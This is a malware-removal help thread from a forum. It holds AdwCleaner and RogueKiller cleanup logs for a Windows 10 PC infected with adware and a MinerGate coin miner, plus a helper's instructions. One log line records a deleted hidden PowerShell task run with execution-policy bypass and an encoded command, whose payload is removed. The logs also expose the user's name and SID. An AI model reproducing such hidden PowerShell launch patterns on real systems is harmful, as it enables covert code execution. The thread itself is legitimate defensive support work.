Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{D062B23B-F8EE-40EC-BF3F-7DB0E9FE1232}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{D3F79FC5-65FE-4650-8979-3BF0CCF02C1A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{05562BE7-0EFC-4BD2-BD8F-FAA363E68410}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{05562BE7-0EFC-4BD2-BD8F-FAA363E68410}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{B52115B1-936F-4EEA-A363-A535FB1942B7}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{B52115B1-936F-4EEA-A363-A535FB1942B7}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{56AD7EEE-D6C0-410E-8A7B-811DEA764554}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{E8EB2F1F-661E-4A7F-8F9A-77DEB757A906}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{AF85DB83-06F2-4ECF-97CF-C46EDB06BE29}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Features\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Products\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|YeaDesktop
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Web Companion
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeper Antivirus
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|PCKeeper Antivirus
Deleted: [Value] - HKCU\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeper Antivirus
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeperLive
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|PCKeeperLive
Deleted: [Value] - HKCU\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeperLive
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\YeaDesktop
Deleted: [Key] - HKCU\Software\YeaDesktop
Deleted: [Value] - HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|YeaDesktop.exe
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION|YeaDesktop.exe
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\MinerGate
Deleted: [Key] - HKCU\Software\MinerGate
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\FastDataX
Deleted: [Key] - HKCU\Software\FastDataX
Deleted: [Key] - HKLM\SOFTWARE\RunBooster
Deleted: [Key] - HKLM\SOFTWARE\Microleaves
Deleted: [Key] - HKLM\SOFTWARE\Essentware
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Essentware
Deleted: [Key] - HKCU\Software\Essentware
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B2CD1132-75C5-427F-8B06-9DA507A5A2B6}
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\APPID\PCKElevatedHost.exe
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\APPID\PCKElevatedHost.exe
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\*\SHELLEX\CONTEXTMENUHANDLERS\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\*\SHELLEX\CONTEXTMENUHANDLERS\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\csastats
Deleted: [Key] - HKCU\Software\csastats
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\PRODUCTSETUP
Deleted: [Key] - HKCU\Software\PRODUCTSETUP
Deleted: [Key] - HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-9

Deleted: C:\Users\BOSS TSAPO\AppData\Local\PO.DB
Deleted: C:\Users\All Users\Desktop\MediaPlayAir.lnk
Deleted: C:\Users\Public\Desktop\MediaPlayAir.lnk


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

Cleaned: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk[http:\\pop.yeawindows.com\]
Cleaned: C:\Users\BOSS TSAPO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk[http:\\pop.yeawindows.com\]
Cleaned: C:\Users\Public\Desktop\Google Chrome.lnk[http:\\pop.yeawindows.com\]


***** [ Tasks ] *****

Deleted: App Explorer
Deleted: ShadowsocksS
Deleted: FastDataX Task
Deleted: PCKeeper updater
Deleted: Updater_Online_Application
Deleted: DllKitPRO
Deleted: Updater_Online_Application


***** [ Registry ] *****

Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\utop.it
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utop.it
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E7E7B26A-88AA-48B0-A47C-173C062FD904}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E44BBEE3-3F83-4670-9E2E-EE0556442287}
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Host App Service
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted: [Key] - HKCU\Software\Host App Service
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted: [Key] - HKLM\SOFTWARE\Lavasoft\Web Companion
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Lavasoft\Web Companion
Deleted: [Key] - HKCU\Software\Lavasoft\Web Companion
Deleted: [Key] - HKLM\SOFTWARE\SkypeUpdateEx
Deleted: [Key] - HKLM\SOFTWARE\WMPNetworkAcSvc
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WindowsTM
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{990F7D4F-09EF-47DF-9ABE-BAF2DCCF5C4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{CF6E1E3B-5B36-4A71-9105-DC75B4089D8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{CF6E1E3B-5B36-4A71-9105-DC75B4089D8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{0319DE47-F039-45DC-A213-DBB61C6AE509}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{0319DE47-F039-45DC-A213-DBB61C6AE509}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{074BFF31-CA38-43C4-8F25-79213AD708EF}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{074BFF31-CA38-43C4-8F25-79213AD708EF}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{0D838143-D511-4555-8B97-16C3CF5A780D}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{0D838143-D511-4555-8B97-16C3CF5A780D}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{16A94A89-66C4-4990-896C-5FC3E1557FFD}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{206E5E13-3B8F-4146-9C21-F18A63A9689B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{206E5E13-3B8F-4146-9C21-F18A63A9689B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{2B5E8E95-F503-4530-A340-53DE89F3358F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{2B5E8E95-F503-4530-A340-53DE89F3358F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{2F8F99FD-7C0E-4150-8DFD-13B1F4FBD916}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{33B2A2E0-18F6-45CB-8080-04320066A4A1}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{40B50C00-06BB-415F-8F4E-6DEF53957ABA}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{40B50C00-06BB-415F-8F4E-6DEF53957ABA}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{503F82AB-1549-4B08-AF10-289CCCF3BE4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{6AF595D6-D4A0-4ACA-ADD4-62034EE9FF3A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{6F09F687-2C4C-4A37-8D7A-2CB76D2B3F71}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{6F09F687-2C4C-4A37-8D7A-2CB76D2B3F71}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{723F0E89-F10C-4D28-A46C-934513EA963A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7944171A-50CC-479E-A6FC-B1E25E665C25}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7A2BA8C4-F382-4DD1-A6D2-A86C6D66C4F9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{7A2BA8C4-F382-4DD1-A6D2-A86C6D66C4F9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{80E9CB05-9C8B-4B85-8A66-D81092F5AF60}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{817BF5D8-380E-44F4-8E61-43E7ECF74B53}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{828FB706-5749-4255-862F-3D30FCF017E1}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{828FB706-5749-4255-862F-3D30FCF017E1}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{8888A22B-3380-4C2B-950F-A5B6EC527A4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{8888A22B-3380-4C2B-950F-A5B6EC527A4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{9443C19D-B318-4EBD-8A7F-6A50D0472FB4}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{95CAD169-7912-410E-8C8A-7BA1729BD8F7}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{B462C1CA-E368-4321-B0B1-0453E4AB6FDB}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{CCF68051-721D-40C7-812D-86ED0FDE7411}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{D8F2F7F9-F8F3-4562-9FDA-C1E2DAE60A30}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{D8F2F7F9-F8F3-4562-9FDA-C1E2DAE60A30}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{DEE0443A-95B1-41DF-B50A-409FDEA53644}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{F55EA208-E122-4B4E-8483-4404A1CC9569}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{F6649783-7559-4772-96C7-02D33BEACD8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{F6649783-7559-4772-96C7-02D33BEACD8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{D062B23B-F8EE-40EC-BF3F-7DB0E9FE1232}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{D3F79FC5-65FE-4650-8979-3BF0CCF02C1A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{05562BE7-0EFC-4BD2-BD8F-FAA363E68410}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{05562BE7-0EFC-4BD2-BD8F-FAA363E68410}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{B52115B1-936F-4EEA-A363-A535FB1942B7}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{B52115B1-936F-4EEA-A363-A535FB1942B7}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{56AD7EEE-D6C0-410E-8A7B-811DEA764554}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{E8EB2F1F-661E-4A7F-8F9A-77DEB757A906}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{AF85DB83-06F2-4ECF-97CF-C46EDB06BE29}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Features\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Products\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|YeaDesktop
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Web Companion
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeper Antivirus
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|PCKeeper Antivirus
Deleted: [Value] - HKCU\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeper Antivirus
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeperLive
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|PCKeeperLive
Deleted: [Value] - HKCU\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeperLive
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\YeaDesktop
Deleted: [Key] - HKCU\Software\YeaDesktop
Deleted: [Value] - HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|YeaDesktop.exe
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION|YeaDesktop.exe
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\MinerGate
Deleted: [Key] - HKCU\Software\MinerGate
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\FastDataX
Deleted: [Key] - HKCU\Software\FastDataX
Deleted: [Key] - HKLM\SOFTWARE\RunBooster
Deleted: [Key] - HKLM\SOFTWARE\Microleaves
Deleted: [Key] - HKLM\SOFTWARE\Essentware
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Essentware
Deleted: [Key] - HKCU\Software\Essentware
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B2CD1132-75C5-427F-8B06-9DA507A5A2B6}
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\APPID\PCKElevatedHost.exe
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\APPID\PCKElevatedHost.exe
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\*\SHELLEX\CONTEXTMENUHANDLERS\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\*\SHELLEX\CONTEXTMENUHANDLERS\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\csastats
Deleted: [Key] - HKCU\Software\csastats
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\PRODUCTSETUP
Deleted: [Key] - HKCU\Software\PRODUCTSETUP
Deleted: [Key] - HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}


***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

Plugin deleted: MSN Homepage & Bing Search Engine -
Plugin deleted: Quick Searcher v16.2 -


*************************

::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0



*************************

C:/AdwCleaner/AdwCleaner[S0].txt - [16518 B] - [2017/11/20 7:21:10]


########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########



Thank you Kevin, I followed each and every step but the problem is still there.

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #10 on: November 20, 2017, 02:18:31 AM »
Thanks for those logs feelityd08. Did you also run MRST? Can I see that log?

Continue with the following:

Download RogueKiller and save it on your desktop; ensure you download the correct version.

RogueKiller (X86)

RogueKiller (x64)

  • Exit all running applications.
  • Double-click on RogueKiller.exe to launch the tool. On its first execution, RogueKiller will display the software license (EULA), click on "Accept" to continue.
  • If RogueKiller is unable to load, do not hesitate to try launching it several times or rename it winlogon.
  • Click "Start Scan" to begin the analysis. This may take some time.
  • Once the scan is complete, click the "Open TXT" button to display the scan report.
  • Copy/Paste its content in your next reply.

Do not use the Remove Selected option until I've had a look at the log.

Thank you,

Kevin...

« Last Edit: November 20, 2017, 03:14:53 AM by kevinf80 »

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #11 on: November 20, 2017, 09:51:06 AM »
RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : BOSS TSAPO [Administrator]
Started from : C:\Users\BOSS TSAPO\Downloads\RogueKiller_portable64.exe
Mode : Delete -- Date : 11/20/2017 16:10:19 (Duration : 01:19:51)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 8 ¤¤¤
[PUP.WindowsTM] (X64) HKEY_CLASSES_ROOT\CLSID\{BFD6B750-C600-456A-BB8F-FA18D10F2C1B} (C:\Program Files (x86)\WindowsTM\TMDeskBand.dll) -> Deleted
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\IM -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\IM -> Not selected
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\ZeoScanner (system32\DRIVERS\zeoscanner.sys) -> Deleted
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://lenovo15.msn.com/?pc=LCTE  -> Not selected
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://lenovo15.msn.com/?pc=LCTE  -> Not selected
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Not selected
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Not selected

¤¤¤ Tasks : 2 ¤¤¤
[Suspicious.Path] \DecBOSS TSAPO -- C:\Users\BOSSTS~1\AppData\Local\Temp\revopartner.tmp -> Deleted
[Mal.Powershell] \{797E0947-0E7E-0F0F-7911-0E0C7A05110D} -- C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [Base64 payload removed]) -> Deleted

¤¤¤ Files : 3 ¤¤¤
[BitMiner.Gen0][File] C:\Applications\Service.exe -> Deleted
[BitMiner.Gen0][Folder] C:\Users\BOSS TSAPO\AppData\Local\minergate -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\.lock -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\instmonsttest@gmail.com.achievements -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\log\minergate.log -> Deleted
[BitMiner.Gen0][Folder] C:\Users\BOSS TSAPO\AppData\Local\minergate\log -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\miners.ini -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\pools.config -> Deleted
[PUP.Essentware|PUP.Gen1][Folder] C:\Program Files\Essentware -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\PCKAVShellExt64.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\ServiceInfrastructure.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\SharedLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\SharedNativeLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\SharedNativeLibraryPS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\zeoscanner.inf -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\zeoscanner.sys -> Deleted
[PUP.Essentware|PUP.Gen1][Folder] C:\Program Files\Essentware\PCKAV -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\AntiTheftServiceLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\AppRemFolder.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Contracts.Account.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Contracts.PCKeeper.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Controls.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\CrashReportSender.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\DiskCleanerComponent.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\DiskCleanerComponentPS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\DrvInstaller.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Elevator.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\fileHiders.inf -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\fileHiders.sys -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Ionic.Zip.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\LocalizationHelpers.dll -> Deleted
[PUP.Essentware|PUP.Gen1][Folder] C:\Program Files\Essentware\PCKeeper -> Deleted

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 4 ¤¤¤
[PUP.Gen0][Chrome:Addon] Default : MSN Homepage & Bing Search Engine [fcfenmboojpjinhpgggodefccipikbpd] -> Not selected
[PUM.SearchEngine][Firefox:Config] 2gwlwnaw.default : user_pref("browser.search.selectedEngine", "Yahoo®"); -> Not selected
[PUM.SearchEngine][Firefox:Config] 2gwlwnaw.default : user_pref("browser.search.defaultenginename", "Yahoo®"); -> Not selected
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [http://www%2Cgoogle.com/] -> Not selected

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 3cda26c2238fcab331261890c96be489
[BSP] 4a20a10860d8ae721877a3165e776450 : Empty|VT.Unknown MBR Code
Partition table:
